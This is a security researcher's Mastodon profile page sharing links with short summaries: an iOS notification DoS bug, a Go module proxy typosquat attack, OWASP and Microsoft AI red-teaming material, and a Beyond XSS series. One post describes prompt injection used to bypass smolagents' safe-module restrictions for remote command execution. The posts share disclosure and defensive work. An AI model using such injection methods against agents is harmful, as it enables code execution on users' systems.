Joseph Zeng

@josephzeng@infosec.exchange
94 Followers
15 Following
126 Posts
All opinions and posts are my own.
My employers (past or present) are not responsible and may not agree with any of them.
Posts do not imply endorsement or agreement as I may just be sharing a discussion/topic of interest.
Twitter (former)https://x.com/josephzengx
Github (For Verification)https://josz5930.github.io/
GitHub - aliasrobotics/cai: Cybersecurity AI (CAI), an open Bug Bounty-ready Artificial Intelligence

Cybersecurity AI (CAI), an open Bug Bounty-ready Artificial Intelligence - aliasrobotics/cai

GitHub

CVE-2025-24091 - sending Darwin notifications to DoS iPhone

POC: Widget extension VeryEvilNotify šŸ˜€

Blog Post:
https://rambo.codes/posts/2025-04-24-how-a-single-line-of-code-could-brick-your-iphone

#iOS #cybersecurity

How a Single Line Of Code Could Brick Your iPhone | Rambo Codes

Gui Rambo writes about his coding and reverse engineering adventures.

Rambo Codes

The writer exposed a critical vulnerability in Hugging Face’s smolagents—a lightweight AI agent framework. By leveraging prompt injection to bypass ā€œsafeā€ module restrictions, attackers can execute arbitrary OS commands, highlighting mounting security risks for autonomous AI systems. - o3-mini summary

https://magic-box.dev/hacking/smoltalk/

#ai #rce #cybersecurity

smoltalk: RCE in Open Source Agents

Big shoutout to Hugging Face and the smolagents team for their cooperation and quick turnaround for a fix!

This write-up reveals how attackers exploited Go's module proxy caching to maintain persistent malicious code distribution—even after repository updates. This sophisticated attack remained undetected for years, highlighting a serious supply chain vulnerability.

Takeaways:
• Proxy caching features can be weaponized
• Traditional security measures may miss these attacks
• Urgent need for enhanced package verification

šŸ’” Action Items for Dev Teams:

  • Implement strict cache control
  • Enhance module monitoring
  • Strengthen dependency validation

#cybersecurity #supplychain

https://socket.dev/blog/malicious-package-exploits-go-module-proxy-caching-for-persistence

Go Supply Chain Attack: Malicious Package Exploits Go Module...

Socket researchers uncovered a backdoored typosquat of BoltDB in the Go ecosystem, exploiting Go Module Proxy caching to persist undetected for years.

Socket

OWASP Threat and Controls Periodic table

https://owaspai.org/goto/periodictable/

#ai

0. AI Security Overview – AI Exchange

Comprehensive guidance and alignment on how to protect AI against security threats - by professionals, for professionals.

Microsoft’s AI red team has tested over 100 generative AI products and uncovered three essential lessons. First, red teaming is the starting point for identifying both security vulnerabilities and potential harms as part of responsible AI risk management. This includes spotting bias, data leakage, or other unintended consequences early in product development Second, human expertise is indispensable for addressing complex AI threats While automated tools can detect issues, they can’t fully capture the nuanced misuse scenarios and policy gaps that experts can identify Third, a defense-in-depth strategy is crucial for safeguarding AI systems Continuous testing, multiple security layers, and adaptive defenses collectively help mitigate risks, as no single measure can eliminate vulnerabilities in ever-evolving models. By combining proactive stress testing, expert analysis, and layered protections, organizations can better navigate the opportunities and challenges presented by generative AI. - LLM Summary

https://www.microsoft.com/en-us/security/blog/2025/01/13/3-takeaways-from-red-teaming-100-generative-ai-products/

#ai

3 takeaways from red teaming 100 generative AI products | Microsoft Security Blog

The growing sophistication of AI systems and Microsoft’s increasing investment in AI have made red teaming more important than ever. Learn more.

Microsoft Security Blog

MIT AI Risk Repository

https://airisk.mit.edu/

#ai

The MIT AI Risk Repository

A comprehensive living database of over 1600 AI risks categorized by their cause and risk domain

A Cloud Guru terminates "lifetime" course access for reasons of "plan being retired".

#cloud #pluralsight

Neural Fictitious Self-Play (NFSP) for Imperfect-Information Games

Reinforcement learning "improviser" and supervised learning "planner"

Blog post and explanation: https://ai.gopubby.com/neural-fictitious-self-play-nfsp-for-imperfect-information-games-0a8189770240

Research paper (not recent):
https://arxiv.org/abs/1603.01121v2

#ai

Neural Fictitious Self-Play (NFSP) for Imperfect-Information Games

Picture yourself at a high-stakes poker table, heart pounding as you weigh your next move with incomplete information. This core challenge of strategic decision-making under uncertainty isn’t just a…

AI Advances

Series on "Beyond XSS" including topics such as Cross-site leaks and CSTI

https://aszx87410.github.io/beyond-xss/en/

Very appropriately, it was built using docusaurus, a static site generator  

#xss #cybersecurity

About This Series | Beyond XSS

As a software engineer, you must be familiar with information security. In your work projects, you may have gone through security audits, including static code scanning, vulnerability scanning, or penetration testing. You may have even done more comprehensive red team exercises. Apart from that, you may have heard of OWASP and have a general idea of what OWASP Top 10 includes and what common security vulnerabilities exist.